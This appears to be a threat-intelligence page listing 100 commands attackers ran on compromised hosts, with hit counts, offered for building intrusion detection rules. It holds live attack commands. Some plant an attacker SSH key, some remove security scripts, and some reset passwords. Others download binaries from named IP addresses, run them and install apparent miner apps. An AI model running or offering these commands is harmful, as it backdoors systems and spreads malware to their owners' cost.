TROYANOSYVIRUS
Updated: April 2026

Top 100 Malicious Commands

Most executed commands by attackers after gaining system access. Useful for intrusion detection and incident response.

5,828 commands in 24h
1.
$uname -a
187 IPs307x
2.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
173 IPs268x
3.
$lockr -ia .ssh
173 IPs268x
4.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
172 IPs267x
5.
$whoami
171 IPs265x
6.
$lscpu | grep Model
171 IPs265x
7.
$top
170 IPs264x
8.
$uname
170 IPs264x
9.
$cat /proc/cpuinfo | grep model | grep name | wc -l
170 IPs264x
10.
$cat /proc/cpuinfo | grep name | wc -l
170 IPs264x
11.
$which ls
170 IPs264x
12.
$ls -lh $(which ls)
170 IPs264x
13.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
171 IPs264x
14.
$uname -m
170 IPs263x
15.
$w
170 IPs263x
16.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
169 IPs263x
17.
$Enter new UNIX password:
108 IPs262x
18.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
170 IPs261x
19.
$crontab -l
169 IPs261x
20.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
101 IPs132x
21.
$/bin/./uname -s -v -n -r -m
21 IPs80x
22.
$/ip cloud print
6 IPs12x
23.
$rm -rf /data/local/tmp/*
3 IPs10x
24.
$echo hello
2 IPs9x
25.
$ifconfig
6 IPs6x
26.
$cat /proc/cpuinfo
6 IPs6x
27.
$ps -ef | grep '[Mm]iner'
6 IPs6x
28.
$chmod 0755 /data/local/tmp/nohup
3 IPs6x
29.
$ps | grep '[Mm]iner'
6 IPs6x
30.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
6 IPs6x
31.
$locate D877F783D5D3EF8Cs
6 IPs6x
32.
$echo Hi | cat -n
6 IPs6x
33.
$pkill target; cd /data/local/tmp/; export PATH=$PATH:/data/local/tmp:/system/bin:/system/xbin; arch=$(uname -m); case $arch in *arm*) target=zyre.arm7;; *86|*64) target=zyre.x86;; *) target=zyre.arm7;; esac; if ! [ -f $target ]; then (wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || curl -o $target http://103.130.214.71:1212/$target 2>/dev/null || busybox wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || busybox curl -o $target http://103.130.214.71:1212/$target
1 IPs5x
34.
$uname -s -v -n -r -m
4 IPs5x
35.
$/data/local/tmp/nohup /data/local/tmp/trinity
2 IPs4x
36.
$ps | grep trinity
2 IPs4x
37.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs4x
38.
$chmod 0755 /data/local/tmp/trinity
2 IPs4x
39.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
2 IPs4x
40.
$pm path com.ufo.miner
2 IPs4x
41.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht
1 IPs4x
42.
$id -u && echo 'SEP' && uname -s && echo 'SEP' && nproc && echo 'SEP' && free -h | awk '/Mem:/ {print $2}'
1 IPs3x
43.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
44.
$Accept-Encoding: gzip
1 IPs2x
45.
$ps | grep rig
1 IPs2x
46.
$uname -s -m
2 IPs2x
47.
$chmod 0755 /data/local/tmp/log
1 IPs2x
48.
$rm /data/local/tmp/tv.apk
1 IPs2x
49.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
50.
$am start -n com.google.home.tv/com.example.test.MainActivity
1 IPs2x
51.
$ps | grep log
1 IPs2x
52.
$ps | grep xig
1 IPs2x
53.
$pm path com.google.home.tv
1 IPs2x
54.
$pm install /data/local/tmp/tv.apk
1 IPs2x
55.
$rm -f /data/local/tmp/ufo.apk
1 IPs2x
56.
$/data/local/tmp/nohup /data/local/tmp/log
1 IPs2x
57.
$PING
1 IPs2x
58.
$/data/local/tmp/nohup su -c /data/local/tmp/log
1 IPs2x
59.
$echo "P@ssw0rd\n3qaQNpDcCx98\n3qaQNpDcCx98\n"|passwd
1 IPs1x
60.
$echo "Frappe09!\n7lXZO1R0dwoR\n7lXZO1R0dwoR\n"|passwd
1 IPs1x
61.
$echo "123456\nU4YASKNFGWYw\nU4YASKNFGWYw\n"|passwd
1 IPs1x
62.
$echo "Dev25\nzomTc4OCC3Ov\nzomTc4OCC3Ov\n"|passwd
1 IPs1x
63.
$echo "Dev25\nPkyyIp6iRz3W\nPkyyIp6iRz3W\n"|passwd
1 IPs1x
64.
$echo "123456\nQSeRroFkH56R\nQSeRroFkH56R\n"|passwd
1 IPs1x
65.
$echo "Dev25\nBQX8B45JcwfW\nBQX8B45JcwfW\n"|passwd
1 IPs1x
66.
$echo "Dev2026\nO3gpkXDqcI2o\nO3gpkXDqcI2o\n"|passwd
1 IPs1x
67.
$echo "Dev2026\n9ZiIlCVpB3vm\n9ZiIlCVpB3vm\n"|passwd
1 IPs1x
68.
$echo "Bot21\nhEvsOvEuPLV9\nhEvsOvEuPLV9\n"|passwd
1 IPs1x
69.
$echo "12345678\nqbByemwtuNH5\nqbByemwtuNH5\n"|passwd
1 IPs1x
70.
$echo "12345678\nmKxpAPJ9BJmm\nmKxpAPJ9BJmm\n"|passwd
1 IPs1x
71.
$echo "Bot21\n902qDVuVqrnf\n902qDVuVqrnf\n"|passwd
1 IPs1x
72.
$echo "Bot2025!@#\nUdcnfH9owsFq\nUdcnfH9owsFq\n"|passwd
1 IPs1x
73.
$echo "Abc12345678!\nGBE7dRl8tdmw\nGBE7dRl8tdmw\n"|passwd
1 IPs1x
74.
$echo "AaAaAaAaAa12345\n4TLH3mGl6rDm\n4TLH3mGl6rDm\n"|passwd
1 IPs1x
75.
$echo "AaAaAaAaAa12345\n1kzfQODlqvch\n1kzfQODlqvch\n"|passwd
1 IPs1x
76.
$echo "frappe2\n2OPbSjceHj9n\n2OPbSjceHj9n\n"|passwd
1 IPs1x
77.
$echo "A123456a\nDyGMi7nbxgOM\nDyGMi7nbxgOM\n"|passwd
1 IPs1x
78.
$echo "fikifoouser\n3D57PQkEWzVd\n3D57PQkEWzVd\n"|passwd
1 IPs1x
79.
$echo "david\nbKboIjE4U0o0\nbKboIjE4U0o0\n"|passwd
1 IPs1x
80.
$echo "A123456a\n3a4j8isRWa5n\n3a4j8isRWa5n\n"|passwd
1 IPs1x
81.
$echo "22222222\nVlACPDSIwS5k\nVlACPDSIwS5k\n"|passwd
1 IPs1x
82.
$echo "12345678\n4EgdUCMU7UIm\n4EgdUCMU7UIm\n"|passwd
1 IPs1x
83.
$echo "0102025405\nLVJuKlsDOBKN\nLVJuKlsDOBKN\n"|passwd
1 IPs1x
84.
$echo "22222222\nEd79cIiEHKww\nEd79cIiEHKww\n"|passwd
1 IPs1x
85.
$echo "claude05\n3gJR2ee6TZF9\n3gJR2ee6TZF9\n"|passwd
1 IPs1x
86.
$echo "2024123\n0lsAtNOfCxAZ\n0lsAtNOfCxAZ\n"|passwd
1 IPs1x
87.
$echo "apollo\nkKriQJwky232\nkKriQJwky232\n"|passwd
1 IPs1x
88.
$echo "ali2025!@#\nl0861veO3oQI\nl0861veO3oQI\n"|passwd
1 IPs1x
89.
$echo "ali2025!@#\navyaKWcgx80X\navyaKWcgx80X\n"|passwd
1 IPs1x
90.
$echo "ali2025!@#\nQeMX9mB6hKxN\nQeMX9mB6hKxN\n"|passwd
1 IPs1x
91.
$echo "1qazEDC\nxiClgQKRqCxk\nxiClgQKRqCxk\n"|passwd
1 IPs1x
92.
$echo "david\nNtmnZoSUxZk5\nNtmnZoSUxZk5\n"|passwd
1 IPs1x
93.
$echo "david\nOB2gVHk85I6s\nOB2gVHk85I6s\n"|passwd
1 IPs1x
94.
$echo "david\nYpIsYpaeDHq3\nYpIsYpaeDHq3\n"|passwd
1 IPs1x
95.
$echo "123qweASD\nw0ok00QnpdJo\nw0ok00QnpdJo\n"|passwd
1 IPs1x
96.
$echo "edu\n2v6tsNw6pvJr\n2v6tsNw6pvJr\n"|passwd
1 IPs1x
97.
$echo "ali2025!@#\nL0Gyupjmyk2W\nL0Gyupjmyk2W\n"|passwd
1 IPs1x
98.
$echo "frappe07!\njH318kDLaDxx\njH318kDLaDxx\n"|passwd
1 IPs1x
99.
$echo "admin123\nNolctfRkIxJB\nNolctfRkIxJB\n"|passwd
1 IPs1x
100.
$echo "123qweASD\naH9Q5iHg7Ftm\naH9Q5iHg7Ftm\n"|passwd
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions.